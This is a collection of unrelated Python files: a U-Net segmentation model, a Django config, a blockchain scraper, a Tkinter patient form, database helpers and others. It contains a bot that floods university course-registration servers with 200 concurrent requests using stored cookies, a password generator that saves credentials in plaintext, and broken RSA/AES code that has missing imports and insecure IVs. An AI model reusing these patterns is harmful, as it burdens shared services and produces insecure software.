### Deconv4
self.net['deconv4'] = Deconv2DLayer(batch_norm(self.net['convde_3_2']),
num_filters=n_filters,
filter_size=2,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
stride=2,
crop=pad)
print "\nDeconv4: self.net['deconv4']", self.net['deconv4'].output_shape
self.net['concat4'] = ConcatLayer([self.net['deconv4'], self.net['conv_1_2']],
cropping=(None, None, "center", "center"))
print "Concat4: self.net['concat4']", self.net['concat4'].output_shape
self.net['convde_4_1'] = Conv2DLayer(self.net['concat4'],
num_filters=n_filters,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Convde41: self.net['convde_4_1']", self.net['convde_4_1'].output_shape
self.net['convde_4_2'] = Conv2DLayer(batch_norm(self.net['convde_4_1']),
num_filters=n_filters,
filter_size=filter_size,
nonlinearity=nonlinearity,
W=lasagne.init.GlorotNormal(),
pad=pad)
print "Convde42: self.net['convde_4_2']", self.net['convde_4_2'].output_shape
####
self.net['output'] = Conv2DLayer(self.net['convde_4_2'],
num_filters=nmb_out_classes,
filter_size=1,
nonlinearity=None)
print "\nself.net['output']", self.net['output'].output_shape
####
# change dimention of batch size and number of classes
self.net['dimshuffle'] = DimshuffleLayer(self.net['output'], (0, 2, 3, 1))
dimshuffle_output_shape = self.net['dimshuffle'].output_shape
print "self.net['dimshuffle']", self.net['dimshuffle'].output_shape
# pull into a vector of size (-1, nmb_classes)
self.net['flattened'] = ReshapeLayer(self.net['dimshuffle'], (-1, nmb_out_classes))
print "self.net['flattened']", self.net['flattened'].output_shape
self.net['softmax_flattened'] = NonlinearityLayer(self.net['flattened'],
nonlinearity=lasagne.nonlinearities.softmax)
print "self.net['softmax_flattened']", self.net['softmax_flattened'].output_shape
self.net['output_for_loss'] = self.net['softmax_flattened']
print "self.net['output_for_loss']", self.net['output_for_loss'].output_shape
# slice matrix for lesion
#self.net['slice_flattened_segmentation'] = SliceLayer(self.net['softmax_flattened'],
# indices=slice(1,2),
# axis=0)
#print "self.net['slice_flattened_segmentation']", self.net['slice_flattened_segmentation'].output_shape
self.net['reshaped_segmentation'] = ReshapeLayer(self.net['softmax_flattened'], dimshuffle_output_shape)
print "self.net['reshaped_segmentation']", self.net['reshaped_segmentation'].output_shape
self.net['output_segmentation'] = DimshuffleLayer(self.net['reshaped_segmentation'], (0, 3, 1, 2))
print "self.net['output_segmentation']", self.net['output_segmentation'].output_shape
def predict(self, X, *args, **kwargs):
"""
Input: X
"""
if not hasattr(self, 'predict_fun'):
raise ValueError("you should add a valid predict_fun to this class"
"(no automatic predict generates since X isn't an InputLayer")
return self.predict_fun(X)
def get_loss_components(self, target, weights):
#target = T.transpose(target)
ce = lasagne.objectives.categorical_crossentropy(T.clip(self.pred_y,PRED_Y_MIN,PRED_Y_MAX), target)
# put weights = weights if want
ce_weighed = lasagne.objectives.aggregate(ce, weights=weights, mode='normalized_sum')
reg_l2 = regularize_network_params(self.outlayer_for_loss, l2) * 10 ** -5
acc = T.eq(T.argmax(self.pred_y, axis=1), target)
acc = lasagne.objectives.aggregate(acc, weights=weights, mode='normalized_sum')
max_0_pred = self.pred_y.max(axis=0)
min_1_pred = self.pred_y.min(axis=0)
return ce_weighed, reg_l2, acc, max_0_pred, min_1_pred
|
# ### Summary of testing debuggin packaging distribuıting
# * unittest is a framework for developing reliable automated tests
# * You define test cases by subclassing from unittest.TestCase
# * unittest.main() is useful for running all of the tests in a module
# * setUp() and tearDown() run code before and after each test method
# * Test methods are defined by creating method names that start with test_
# * TestCase.assert... methods make a test method fail when the right
# conditions aren't met
# * Use TestCase.assertRaises() in a with-statement to check that the right
# exceptions are thrown in a test
# * Python's standard debugger is called PDB
# * PDB is a standard command-line debugger
# * pdb.set_trace() can be used to stop program execution and enter the
# debugger
# * Your REPL's prompt will change to (Pdb) when you're in the debugger
# * You can access PDB's built-in help system by typing help
# * Use “python -m pdb <script name>" to run a program under PDB from
# the start
# * PDB's where command shows the current call stack
# * PDB's next command lets execution continue to the next line of code
# * PDB's continue command lets program execution continue indefinitely, or
# until you stop it with control-c
# * PDB's list command shows you the source code at your current location
# * PDB's return command resumes execution until the end of the current
# function
# * PDB's print command lets you see the values of objects in the debugger
# * Use quit to exit PDB
# * Virtual environments are light-weight, self-contained Python
# installations that any user can create
# * pyvenv is the standard tool for creating virtual environments
# * pyvenv accepts both a source-installation argument as well as a
# directory name into which is create the new environment
# * To use a virtual environment, you need to run its activate script
# * When you activate a virtual environment, your prompt is modified to
# remind you
# * The distutils package is used to help you distribute your Python code
# * distutils is generally used inside a setup.py script which users run to
# install your software
# * The main function in distutils is setup()
# * setup() takes a number of arguments describing both the source files
# as well as metadata for the code
# * The most common way to use setup.py is to install code using python
# setup.py install
# * setup.py can also be used to generate distributions of your code
# * Distributions can be zip files, tarballs, or several other formats
# * Pass --help to setup.py to see all of its options
# * Three common tools for installing third-party software are distutils,
# easy_install, and pip
# * The central repository for Python packages is the Python Package
# Index, also called PyPI or "cheeseshop"
# * You can install easy_install by downloading and running
# distribute_setup.py
# * You use easy_install to install modules by running easy_install
# package-name from the command line
# * You can install pip via easy_install
# * To install modules with pip, use the subcommand notation pip install
# package-name
# * divmod() calculates the quotient and remainder for a division operation
# at one time
# * reversed() function can reverse a sequence
# * You can pass -m to your Python command to have it run a module as a
# script
# * Debugging makes is clear that Python is evaluating everything at run
# time
# * You can use the __file__ attribute on a module to find out where its
# source file is located
# * Third-party python is generally installed into your installation's sitepackages
# directory
# * nose is a useful tool for working with unittest-based tests |
from rover.settings import *
DATABASES['default'] = {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
# Disable Authentication for Tests
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
'PAGE_SIZE': 100
} |
# coding=utf-8
import sublime_plugin, datetime
class insertDatetimeCommand(sublime_plugin.TextCommand):
def run(self, edit, format):
timestamp = datetime.datetime.now()
if format == "ymd":
# yyyy-mm-dd
timestamp = timestamp.strftime("%Y-%m-%d")
elif format == "ymdhms":
# %X = %H:%M:%S
timestamp = timestamp.strftime("%Y-%m-%d %X")
elif format == "ymdhm":
# yyyy-mm-dd_hh-mm
timestamp = timestamp.strftime("%Y-%m-%d_%H-%M")
#for region in the selection
for r in self.view.sel():
#put in the timestamp
#(if text is selected, it'll be replaced in an intuitive fashion)
self.view.erase(edit, r)
self.view.insert(edit, r.begin(), timestamp) |
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
from pydrive.auth import GoogleAuth
import quickstart
import hashlib
def authenticate():
gauth = GoogleAuth()
gauth.LocalWebserverAuth()
drive = GoogleDrive(gauth)
file1 = drive.CreateFile({'title': 'Hello.txt'}) # Create GoogleDriveFile instance with title 'Hello.txt'.
file1.SetContentString('Hello World!') # Set content of the file from given string.
file1.Upload()
def store_privKey(private_key):
pem = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
)
with open('private_key.pem', 'wb+') as f:
f.write(pem)
def store_pubKey(public_key):
pem = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
pem1 = pem.decode()
return pem1
def readKey():
with open("public_keys.txt") as f: #in read mode, not in write mode, careful
rd=f.readlines()
return rd
def keyToBytes(public_key):
pem = public_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
return pem
def genRSAKey():
private_key = rsa.generate_private_key(
public_exponent = 65537,
key_size = 2048,
backend= default_backend()
)
return private_key
def encryptRSA(byteKey, public_key):
#Encrypt RSA
encryptedKey = public_key.encrypt(
byteKey,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
return encryptedKey
#decrypt RSA
def decryptRSA(encryptedAESKey, private_key):
original_message = private_key.decrypt(
encryptedAESKey,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
return original_message
def findKey(file, identifier):
y = 0
count = len(file)
start = 400
pkLength = 434
while (y != count):
pKey = file[y]
toCompare = ''
for x in range (start, pkLength):
toCompare += pKey[x]
y = y + 1
start = start + 464
pkLength = pkLength + 464
def AESKey():
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
key = hashlib.sha256(iv).digest()
return key
def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
""" Encrypts a file using AES (CBC mode) with the
given key.
key:
The encryption key - a string that must be
either 16, 24 or 32 bytes long. Longer keys
are more secure.
in_filename:
Name of the input file
out_filename:
If None, '<in_filename>.enc' will be used.
chunksize:
Sets the size of the chunk which the function
uses to read and encrypt the file. Larger chunk
sizes can be faster for some files and machines.
chunksize must be divisible by 16.
"""
if not out_filename:
out_filename = in_filename + '.enc'
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
|
import numpy as np
from ..utils import read_hdf5_array
from ..sampling import eFAST_omega
def eFAST_first_order(Y, M, omega):
"""Sobol first order index estimator."""
N = Y.shape[0]
f = np.fft.fft(Y)
Sp = np.power(np.absolute(f[np.arange(1, int((N + 1) / 2))]) / N, 2)
V = 2 * np.sum(Sp)
D1 = 2 * np.sum(Sp[np.arange(1, M + 1) * int(omega) - 1])
return D1 / V
def eFAST_total_order(Y, omega):
"""Sobol total order index estimator."""
N = Y.shape[0]
f = np.fft.fft(Y)
Sp = np.power(np.absolute(f[np.arange(1, int((N + 1) / 2))]) / N, 2)
V = 2 * np.sum(Sp)
Dt = 2 * sum(Sp[np.arange(int(omega / 2))])
return 1 - Dt / V
def eFAST_indices(filepath_Y, num_params, M=4, selected_iterations=None):
"""Compute estimations of Sobol' first and total order indices with extended Fourier Amplitude Sensitivity Test (eFAST).
High values of the Sobol first order index signify important parameters, while low values of the total indices
point to non-important parameters. First order computes main effects only, total order takes into account
interactions between parameters.
Parameters
----------
filepath_Y : Path or str
Filepath to model outputs ``y`` in .hdf5 format obtained by running model according to eFAST samples.
num_params : int
Number of model inputs.
M : int
Interference factor, usually 4 or higher, should be consistent with eFAST sampling.
selected_iterations : array of ints
Iterations that should be included to compute eFAST Sobol indices.
Returns
-------
sa_dict : dict
Dictionary that contains computed first and total order Sobol indices.
References
----------
Paper:
:cite:ts:`saltelli1999quantitative`
Link to the original implementation:
https://github.com/SALib/SALib/blob/master/src/SALib/analyze/fast.py
"""
y = read_hdf5_array(filepath_Y)
y = y.flatten()
if selected_iterations is not None:
y = y[selected_iterations]
iterations = len(y)
iterations_per_param = iterations // num_params
# Recreate the vector omega used in the sampling
omega = eFAST_omega(iterations_per_param, num_params, M)
# Calculate and Output the First and Total Order Values
first = np.zeros(num_params)
total = np.zeros(num_params)
first[:], total[:] = np.nan, np.nan
if selected_iterations is not None:
iterations_per_param_current = len(y) // num_params
assert iterations_per_param == len(y) / num_params
else:
iterations_per_param_current = iterations_per_param
for i in range(num_params):
l = np.arange(i * iterations_per_param, (i + 1) * iterations_per_param)[
:iterations_per_param_current
]
first[i] = eFAST_first_order(y[l], M, omega[0])
total[i] = eFAST_total_order(y[l], omega[0])
sa_dict = {
"First order": first,
"Total order": total,
}
return sa_dict
|
#!/usr/bin/env python3
import sys
import psycopg2
import scraper
import database
""" Loads and processes all data related to block with given number """
def process_block(block_number):
b = scraper.load_block(block_number)
try:
database.save_block(b)
except psycopg2.IntegrityError:
print("Block <{}> already loaded".format(block_number))
for tx_hash in b["transactions"]:
tx = scraper.load_transaction(tx_hash)
try:
database.save_transaction(tx)
except psycopg2.IntegrityError:
print("Transaction <{}> already loaded".format(tx_hash))
""" Processes blocks as per CLI args """
def process():
if len(sys.argv) != 3:
print("Pass block number and number of blocks as arguments")
return
block_number = int(sys.argv[1])
blocks = int(sys.argv[2])
for i in range(0, blocks):
process_block(block_number + i)
print("Processed block <{}>".format(block_number + i))
process()
|
# Create your views here.
from pprint import pprint
from django.shortcuts import render
from lab2 import GetWeather_Data
from lab2.GetWeather_Data import CitySearchError
def index(request):
return render(request, "lab2/lab2.html")
def weather(request):
latitude = request.GET['latitude']
longitude = request.GET['longitude']
try:
data = GetWeather_Data.from_lat_long(latitude, longitude)
pprint(data)
except CitySearchError as e:
data = None
print(e.message)
return render(request, "lab2/weather.html", {'data': data})
|
N = int(input())
S = []
T = []
for i in range(N):
si, ti = tuple(input().split())
S.append(si)
T.append(int(ti))
X = input()
i = S.index(X)
print(sum(T[i + 1:]))
|
import numpy as np
from os import fstat
from .utils import *
def ReadIndex(f, fileSize):
nBytes = fileSize - f.tell()
if nBytes <= 0:
return True
nRows = int(nBytes / 64)
table = f.read(nBytes)
print(" ")
print("-----------------------------------------------------------------"
"------------------------------------------")
print("| Step | Rank | PGPtr | VarPtr | AttPtr |"
" EndPtr | Timestamp | unused |")
print("+----------------------------------------------------------------"
"-----------------------------------------+")
for r in range(0, nRows):
pos = r * 64
data = np.frombuffer(table, dtype=np.uint64, count=8, offset=pos)
step = str(data[0]).rjust(9)
rank = str(data[1]).rjust(9)
pgptr = str(data[2]).rjust(12)
varptr = str(data[3]).rjust(12)
attptr = str(data[4]).rjust(12)
endptr = str(data[5]).rjust(12)
time = str(data[6]).rjust(12)
unused = str(data[7]).rjust(12)
print("|" + step + " |" + rank + " |" + pgptr + " |" + varptr + " |" +
attptr + " |" + endptr + " |" + time + " |" + unused + " |")
print("-----------------------------------------------------------------"
"------------------------------------------")
if fileSize - f.tell() > 1:
print("ERROR: There are {0} bytes at the end of file"
" that cannot be interpreted".format(fileSize - f.tell() - 1))
return False
return True
def DumpIndexTable(fileName):
print("========================================================")
print(" Index Table File: " + fileName)
print("========================================================")
status = False
with open(fileName, "rb") as f:
fileSize = fstat(f.fileno()).st_size
status = ReadHeader(f, fileSize, "Index Table")
if status:
status = ReadIndex(f, fileSize)
return status
if __name__ == "__main__":
print("ERROR: Utility main program is bp4dbg.py")
|
import requests
from threading import Thread
import sys
import queue
import urllib.parse
import pickle
from sample.parse import get_selected_course
class select_course(object):
def __init__(self,username,MAX,TIMEOUT,index1='',index2=''):
'''
初始化一些参数
max为队列倍数
index1 index2分别为选课页数和在课程在页数上的序号 用作发出选课请求
view字典里储存着之前获取的每个页面的view参数 可快速进行抢课而不用等待解析
urls是当前可用选课服务器
data是发出选课post所需参数
'''
self.concurrent = 200
self.q = queue.Queue(self.concurrent * 2)
self.username = username
self.timeout = TIMEOUT
self.max = MAX
self.index1, self.index2 = index1,index2
self.response = ''
self.session = requests.session()
self.session.headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) \
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36'
with open('data/cookies/'+ self.username +'.txt','rb') as f:
cookies = requests.utils.cookiejar_from_dict(pickle.load(f))
self.session.cookies = cookies
with open('data/values/'+self.username+'view.txt', 'rb') as f:
view = pickle.load(f)
self.view = view
self.urls = [
'http://202.192.18.189',
'http://202.192.18.184',
'http://202.192.18.183',
'http://202.192.18.182'
]*self.max
def post(self):
'''发出选课请求函数 用作被run函数调用'''
self.data = {
'__EVENTTARGET': '',
'__EVENTARGUMENT': '',
'__VIEWSTATE':self.view['state'+self.index1],
"__VIEWSTATEGENERATOR" : self.view['generator'+self.index1],
'ddl_kcxz': '',
'ddl_ywyl': urllib.parse.quote_plus('有'.encode('gb2312')),
'ddl_kcgs': '',
'ddl_xqbs': '1',
'ddl_sksj': '',
'TextBox1': '',
'kcmcGrid:_ctl'+self.index2+':xk':'on',
'Button1': urllib.parse.quote_plus(' 提交 '.encode('gb2312')),
'dpkcmcGrid:txtChoosePage': self.index1,
'dpkcmcGrid:txtPageSize': '100',
'dpDataGrid2:txtChoosePage':'1',
'dpDataGrid2:txtPageSize':'100'
}
while True:
try:
url = self.q.get()
response = self.session.post(url,data = self.data,timeout = self.timeout)
if response.status_code == 200:
self.response = response
self.selected = self.get_selected_course(response)
self.q.task_done()
except:
self.q.task_done()
def run(self):
for i in range(self.concurrent):
t = Thread(target=self.post)
t.daemon = True
t.start()
try:
for host in self.urls:
url = host+'/xf_xsqxxxk.aspx?xh='+self.username+'&xm='+self.view['urlname']+'&gnmkdm=N121203'
self.q.put(url.strip())
self.q.join()
except KeyboardInterrupt:
sys.exit(1)
def show_selected(self):
try:
courses = get_selected_course(self.response)
print('已选课程:{}'.format(courses))
return courses
except :
self.session.get('http://202.192.18.184')
url="http://202.192.18.184/xf_xsqxxxk.aspx?xh="+self.username
response = self.session.get(url)
courses = get_selected_course(response)
print('已选课程:{}'.format(courses))
return courses
|
"""
*
* Author: Juarez Paulino(coderemite)
* Email: juarez.paulino@gmail.com
*
"""
d=int(input())
n=int(input())
r=0
for x in map(int,input().split()):r+=d-x
print(r-d+x)
|
# -*- coding:utf-8 -*-
# import pymysql as ps
# import pymssql as ps
import contextlib
import pandas as pd
from Common.Config.DBConfig import DBConfig
from Common.DB.EnumType import *
from Common.DB.DBCommon import DBCommon
dbType =DBConfig.getDBType()
if dbType == DBType.MYSQL:
import pymysql as ps
elif dbType == DBType.SQLSERVER:
import pymssql as ps
else:
None
class DataAccess:
def __init__(self,config=True):
if config:
self.host=DBConfig.getDBHOST()
self.port = DBConfig.getDBPORT()
self.user=DBConfig.getDBUSER()
self.passwd=DBConfig.getDBPASSWORD()
self.database=DBConfig.getDBName()
self.charset=DBConfig.getDBCHARSET()
self.__conn=None
self.__cursor=None
self.__dictCursor=None
def __del__(self):
self.close()
def close(self):
if self.__cursor:
self.__cursor.close()
if self.__dictCursor:
self.__dictCursor.close()
if self.__conn:
self.__conn.close()
@property # 修饰器
def Conn(self):
if self.__conn ==None:
self.__conn=self.connect2()
return self.__conn
@property # 修饰器
def Cursor(self):
if self.__cursor ==None:
self.__cursor=self.Conn.cursor()
return self.__cursor
@Cursor.setter
def Cursor(self, value):
self.__cursor = value
@property # 修饰器
def DictCursor(self):
if self.__dictCursor == None:
self.__dictCursor = self.Conn.cursor(cursor=ps.cursors.DictCursor)
return self.__dictCursor
def connect(self,host='localhost',port=3306,user='root',passwd='',database='test',charset='utf8'):
try:
if dbType == DBType.MYSQL:
conn = ps.connect(host=host, user=user, passwd=passwd, db=database, port=port, charset=charset)
elif dbType == DBType.SQLSERVER:
conn = ps.connect(server=host, user=user, password=passwd, database=database, port=port, charset=charset)
else:
None
return conn
except :
raise("DataBase connect error,please check the db config.")
def connect2(self,**kwargs):
conn=None
if kwargs=={}:
conn=self.connect(self.host,self.port,self.user,self.passwd,self.database,self.charset)
else:
conn=self.connect(host=kwargs["host"], port=kwargs["port"], user=kwargs["user"], password=kwargs["password"],
charset=kwargs["charset"], database=kwargs["database"])
return conn
"""
命令类型,如果是sql语句,则为CommandType.Text,否则为 CommandType.StoredProcdure
返回受影响的行数
"""
def __Execute(self,cmdText, params=None,rowType=RowType.Many,commit=True,cursor=None):
count=None
columns=None
columnHeads = []
try:
if not cursor:
cursor=self.Cursor
if params is None:
effect_row =cursor.execute(cmdText)
else:
effect_row = cursor.execute(cmdText,params)
columns = cursor.description
if rowType== RowType.Many:
rows = cursor.fetchall()
else:
rows = cursor.fetchone()
dfrows= pd.DataFrame(list(rows))
for column in columns:
columnHeads.append(column[0])
if not dfrows.empty:
dfrows.columns=columnHeads
effect_row=cursor.rowcount
return { 'effect_row':effect_row,'rows': dfrows,'heads':columnHeads}
except ps.Error as e:
print(e)
finally:
if commit:
self.Conn.commit()
def ExecuteNonQuery(self,cmdText,params=None,commit=True):
return self.__Execute(cmdText,params,RowType.Many,commit)
"""
返回查询结果的第一行第一列
"""
def ExecuteScalar(self,cmdText,params=None,commit=True):
return self.__Execute(cmdText,params, RowType.One, commit)
def ExecuteMany(self, cmdText,params=None, commit=True):
try:
effect_row = self.Cursor.executemany(cmdText, params)
lastid =self.Cursor.lastrowid
return {'effect_row': effect_row, 'lastid': lastid}
finally:
if commit:
self.Conn.commit()
# 定义上下文管理器,连接后自动关闭连接
@contextlib.contextmanager
def mysql(self,conn=None):
close =False
if not conn:
close=True
conn=self.connect2()
if type(conn)==ps.connections.Connection:
cursor = conn.cursor()
try:
yield cursor
finally:
conn.commit()
cursor.close()
if close:
conn.close()
def ExecuteNonQueryByConn(self,cmdText,params=None,conn=None):
with self.mysql(conn) as cursor:
return self.__Execute(cmdText,params,RowType.Many,False,cursor)
def ExecuteScalarByConn(self,cmdText,params=None,conn=None):
with self.mysql(conn) as cursor:
return self.__Execute(cmdText,params, RowType.One,False, cursor)
def ExecuteManyByConn(self, cmdText,params=None,conn=None):
with self.mysql(conn) as cursor:
try:
effect_row = cursor.executemany(cmdText, params)
lastid = cursor.lastrowid
return {'effect_row': effect_row, 'lastid': lastid}
except ps.Error as e:
print(e)
finally:
pass
def ExecuteStoredProcdure(self, cmdText, params=None,conn=None):
with self.mysql(conn) as cursor:
try:
if not params:
cursor.callproc(cmdText)
rs=cursor.fetchall()
else:
str = DBCommon.getArgs(cmdText, params)
cursor.callproc(cmdText, args=params)
rs = cursor.fetchall()
cursor.execute(str) # str = DBCommon.getArgs(cmdText, params)
cursor.execute("select 1")
params = cursor.fetchall()
return (rs,params)
except ps.Error as e:
print(e)
finally:
pass
|
"""Add widgets onto URI contexts."""
from django.conf import settings
import www.common.context
from .models import WikiPage, WikiHome
from .page import OneColumnPage
def home_widget_context(context):
"""If it exists, add the home wiki to the context, otherwise set
it to None."""
if 'id' not in context:
return
ctx = context.setdefault('widgets', {})
guid = context['id']
if settings.WIDGETS_ENABLE_HOME_PAGE:
wiki_page = WikiPage.objects.get_or_create_wikipage(guid, 'Home')
ctx['wiki'] = wiki_page.wiki
ctx['home'] = wiki_page.page
else:
ctx['wiki'], _ = WikiHome.objects.get_or_create(slug=guid)
if settings.WIDGETS_ENABLED:
www.common.context.pre_processors.add(home_widget_context)
|
import random
file = open('allpsswrds.txt', 'a')
email = input("What email did you use?")
uname = input("What username did you use?")
account = input("What is this for?")
gen_psswrd = ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
list_of_char = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',
'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')']
ugly_pass = random.sample(list_of_char, len(gen_psswrd))
real_pass = (''.join(ugly_pass))
keys = "email: "+str(email)+" | uname: "+str(uname)+" | account: "+str(account)+" | password: "+str(real_pass)
print("Here is the key for " + account)
print(keys)
file.write('\n')
file.write(keys)
file.close()
|
from tkinter import *
from PIL import Image,ImageTk
from tkinter import messagebox
import sqlite3
class Register:
def __init__(self, master):
#Toplevel.__init__(self)
global master_root
#master_root = master
self.root=master
#self.root.state('zoomed')
self.root.title("Registeration")
self.root.geometry("720x620+20+20")
self.root.resizable(False, False)
#self.top = Frame(self, height=120, bg='orange')
#self.top.pack(fill=X)
self.bottom = Frame(self.root, height=500, bg='lightblue')
self.bottom.pack(fill=X)
self.raw_image = Image.open('icons/bckgrnd.png')
self.raw_image = self.raw_image.resize((1600, 900))
self.img = ImageTk.PhotoImage(self.raw_image)
self.panel = Label(self.bottom, image=self.img)
self.panel.pack()
self.panel.grid_propagate(0)
self.register_icon = PhotoImage(file='icons/patient.png')
self.icon_label = Label(self.panel, bg='#ebe6d8', image=self.register_icon)
self.icon_label.place(x=200, y=30)
self.top_label = Message(self.panel, width=600, font=("Monotype Corsiva", 20, "bold italic"),text="Registeration", bg="#ebe6d8", relief=SOLID, borderwidth=2)
self.top_label.place(x=290, y=40)
self.Gender = StringVar(value='@')
self.Gender.set(value='Others')
self.bottom.grid_propagate(0)
self.home_icon = PhotoImage(file='icons/home-run.png')
self.l_fname = Label(self.bottom, text='First Name', font=('arial'))
self.l_lname = Label(self.bottom, text='Last Name', bg='#ebe6d8', font=('arial'))
self.l_dob = Label(self.bottom, text='Date Of Birth', bg='#ebe6d8', font=('arial'))
self.l_yr = Label(self.bottom, text='(YYYY-MM-DD)', bg='#ebe6d8', font=('arial 10 bold'))
self.l_address = Label(self.bottom, text='Address:', bg='#ebe6d8', font=('arial'))
self.l_gender = Label(self.bottom, text='Gender:', bg='#ebe6d8', font=('arial'))
self.l_bgroop = Label(self.bottom, text='BLood Group', bg='#ebe6d8', font=('arial'))
self.l_phone = Label(self.bottom, text='Contact No.', bg='#ebe6d8', font=('arial'))
self.l_email = Label(self.bottom, text='Email Address', bg='#ebe6d8', font=('arial'))
self.firstname = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
self.lastname = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
self.dob = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
self.address = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
self.bgroop = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
self.phone = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
self.email = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
self.submit = Button(self.bottom, text='Submit', command=self.submit, bg='#ebe6d8', padx=20, font=('arial'))
self.home_button = Button(self.bottom, image=self.home_icon, command=self.Homepage, bg='#ebe6d8', padx=20,
font=('arial'))
self.r1 = Radiobutton(self.bottom, variable=self.Gender, value='Male', bg='white', text='Male',
font=('arial'))
self.r2 = Radiobutton(self.bottom, variable=self.Gender, value='Female', bg='white', text='Female',
font=('arial'))
self.r3 = Radiobutton(self.bottom, variable=self.Gender, value='Others', bg='white', text='Others',
font=('arial'))
self.l_lname.place(x=40, y=200)
self.l_fname.place(x=40, y=160)
self.l_dob.place(x=40, y=240)
self.l_yr.place(x=40, y=270)
self.l_address.place(x=40, y=300)
self.l_gender.place(x=40, y=340)
self.l_bgroop.place(x=40, y=380)
self.l_phone.place(x=40, y=420)
self.l_email.place(x=40, y=460)
self.firstname.place(x=200, y=160)
self.lastname.place(x=200, y=200)
self.dob.place(x=200, y=240)
self.address.place(x=200, y=300)
self.r1.place(x=200, y=340)
self.r2.place(x=320, y=340)
self.r3.place(x=440, y=340)
self.bgroop.place(x=200, y=380)
self.phone.place(x=200, y=420)
self.email.place(x=200, y=460)
self.home_button.place(x=670, y=30)
self.submit.place(x=475, y=525)
self.footer = Label(self.panel, bg="ivory3", height=1, text="@Copyright 2020 Alokanand. All rights reserved")
self.footer.pack(side=BOTTOM, fill=X)
self.panel.pack_propagate(0)
mainloop()
def submit(self):
self.val1 = self.firstname.get()
self.val2 = self.lastname.get()
self.val3 = self.dob.get()
self.val4 = self.address.get()
self.val5 = self.bgroop.get()
self.val6 = self.phone.get()
self.val7 = self.email.get()
self.val8 = self.Gender.get()
conn = sqlite3.connect('patients_book.db')
c = conn.cursor()
if self.val1 == '' or self.val2 == ' ' or self.val3 == ' ' or self.val4 == ' ' or self.val5 == ' ' or self.val6 == ' ' or self.val7 == ' ':
messagebox.showinfo('Warning!', 'Please fill all entries !!!')
elif len(self.val6) != 10:
messagebox.showinfo('Mobile No. has 10 digits !', 'Please fill proper Mobile No. !!!')
elif '@' not in self.val7 or '.com' not in self.val7 or '@.com' in self.val7 or ' ' in self.val7:
messagebox.showinfo('Suggestion !!', 'Please fill proper E-mail ID !!!')
else:
sql = "INSERT INTO 'patients' (first_name ,last_name ,address ,email ,DOB,Gender,Blood_group,mobile_no) VALUES (?,?,?,?,?,?,?,?) "
c.execute(sql, (self.val1, self.val2, self.val4, self.val7, self.val3, self.val8, self.val5, self.val6))
conn.commit()
conn.close()
messagebox.showinfo('Success!', 'Your Data is Registered')
self.firstname.delete(0, END)
self.lastname.delete(0, END)
self.dob.delete(0, END)
self.address.delete(0, END)
self.bgroop.delete(0, END)
self.phone.delete(0, END)
self.email.delete(0, END)
def Homepage(self):
self.bottom.destroy()
self.panel.destroy()
import register
register.ViewPage(self.root)
#master_root.deiconify()
#mainloop()
# app=Register()
# app.mainloop()
if __name__ == "__main__":
root = Tk()
Register(root)
root.mainloop()
|
import utils
import speech
LARGE_NUMBER_DAYS = 3650
def ensure_date_and_service_slots_filled(intent):
if ("value" not in intent["slots"]["Date"]) or ("value" not in intent["slots"]["Service"]):
speechlet_response = {
"shouldEndSession": False,
"directives": [{"type": "Dialog.Delegate"}]
}
return utils.build_response(speechlet_response)
return None
def ensure_date_is_a_sunday(intent, future_days_go_back_year_threshold=LARGE_NUMBER_DAYS):
try:
date = utils.sunday_from(intent["slots"]["Date"]["value"],
future_days_go_back_year_threshold)
except RuntimeError as e:
speech_output = e.message
get_date_directives = [{"type": "Dialog.ElicitSlot", "slotToElicit": "Date"}]
speechlet_response = utils.build_speechlet_response(output=speech_output,
reprompt_text=None,
should_end_session=False,
directives=get_date_directives)
return None, utils.build_response(speechlet_response)
return date, None
def ensure_service_valid(intent):
try:
